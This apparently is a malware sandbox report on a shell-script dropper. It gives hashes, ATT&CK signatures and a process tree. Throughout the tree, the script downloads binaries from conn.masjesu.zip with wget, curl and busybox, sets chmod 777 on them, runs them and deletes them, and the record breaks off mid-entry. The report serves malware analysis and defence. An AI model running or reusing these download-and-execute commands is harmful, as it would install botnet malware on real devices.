7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e

Analysis

max time kernel
87s
max time network
89s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
Size

10KB
MD5

7af7e75bfec2bdec706e7d434b5662cf
SHA1

041c56f201a42abf891e2e8ee49ba76dfcfadcf1
SHA256

7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e
SHA512

f5b5ca144915eefac919f16fb97e39a47efc3be62201705eeaf56f25b7afcb7a20b96db3ba94989510ad07f54ba014f2f9df00f0f1a3e48a780f11f35861f7c2
SSDEEP

192:h0wtGG2kARmOJPzH+2IJ7O5BUD+u0ThdKKRYSb8UYB+G1UYB+Gn0wtGG4kARmOB8:6kARmOJPzH+xJ7MfTDb8UYB+G1UYB+GF

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
916	chmod
972	chmod
1007	chmod
1021	chmod
937	chmod
760	chmod
895	chmod
909	chmod
812	chmod
881	chmod
923	chmod
944	chmod
951	chmod
1014	chmod
888	chmod
902	chmod
1028	chmod
965	chmod
986	chmod
827	chmod
930	chmod
958	chmod
993	chmod
782	chmod
834	chmod
856	chmod
979	chmod
1000	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
806	busybox
884	wget
968	wget
989	wget
837	wget
901	busybox
933	wget
948	curl
978	busybox
894	busybox
919	wget
997	curl
1020	busybox
940	wget
976	curl
1013	busybox
898	wget
906	curl
996	wget
1010	wget
936	busybox
999	busybox
1004	curl
789	wget
849	busybox
880	busybox
892	curl
922	busybox
1017	wget
823	curl
962	curl
1025	curl
764	wget
833	busybox
926	wget
941	curl
955	curl
954	wget
983	curl
1018	curl
1027	busybox
830	wget
912	wget
920	curl
927	curl
1003	wget
758	busybox
826	busybox
915	busybox
947	wget
1006	busybox
992	busybox
1024	wget
818	wget
831	curl
840	curl
957	busybox
969	curl
891	wget
908	busybox
913	curl
735	wget
748	curl
765	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	curl
File opened for modification	/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	curl
File opened for modification	/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	curl
File opened for modification	/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	curl
File opened for modification	/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	curl
File opened for modification	/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n	curl
File opened for modification	/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	curl
File opened for modification	/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	curl
File opened for modification	/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	curl
File opened for modification	/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	curl
File opened for modification	/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	curl
File opened for modification	/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	curl
File opened for modification	/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	curl
File opened for modification	/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr	curl
File opened for modification	/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	curl
File opened for modification	/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb	curl
File opened for modification	/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4	curl
File opened for modification	/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	curl
File opened for modification	/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI	curl
File opened for modification	/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv	curl
File opened for modification	/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij	curl
File opened for modification	/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR	curl
File opened for modification	/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK	curl
File opened for modification	/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll	curl
File opened for modification	/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH	curl
File opened for modification	/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD	curl
File opened for modification	/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd	curl
File opened for modification	/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN	curl

/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
/tmp/7f7be811d6a27231800a221f543dc515b9be0376f463c35edbe971f9fd1baa3e.sh
1⤵
PID:729
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:731
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:735
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:748
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:758
- /bin/chmod
  chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  ./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Executes dropped EXE
  PID:761
- /bin/rm
  rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:762
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:764
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:765
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:775
- /bin/chmod
  chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  ./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Executes dropped EXE
  PID:783
- /bin/rm
  rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:787
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:789
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:795
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - System Network Configuration Discovery
  PID:806
- /bin/chmod
  chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  ./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:817
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - System Network Configuration Discovery
  PID:818
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:823
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - System Network Configuration Discovery
  PID:826
- /bin/chmod
  chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  ./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Executes dropped EXE
  PID:828
- /bin/rm
  rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:829
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:830
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:831
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:833
- /bin/chmod
  chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  ./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Executes dropped EXE
  PID:835
- /bin/rm
  rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  PID:836
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:837
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:840
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - System Network Configuration Discovery
  PID:849
- /bin/chmod
  chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  ./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Executes dropped EXE
  PID:858
- /bin/rm
  rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:861
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:862
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:872
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - System Network Configuration Discovery
  PID:880
- /bin/chmod
  chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  ./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  PID:887
- /bin/chmod
  chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  ./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - System Network Configuration Discovery
  PID:894
- /bin/chmod
  chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  ./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/chmod
  chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  ./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  ./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  ./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:922
- /bin/chmod
  chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  ./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - System Network Configuration Discovery
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:929
- /bin/chmod
  chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  ./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  ./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:943
- /bin/chmod
  chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  ./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:950
- /bin/chmod
  chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  ./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - System Network Configuration Discovery
  PID:957
- /bin/chmod
  chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  ./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:964
- /bin/chmod
  chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  ./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
  rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
  2⤵
  PID:967
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - System Network Configuration Discovery
  PID:968
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:969
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:971
- /bin/chmod
  chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - File and Directory Permissions Modification
  PID:972
- /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  ./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  - Executes dropped EXE
  PID:973
- /bin/rm
  rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
  2⤵
  PID:974
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  PID:975
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:976
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - System Network Configuration Discovery
  PID:978
- /bin/chmod
  chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  ./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
  2⤵
  PID:981
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  PID:982
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:983
- /bin/busybox
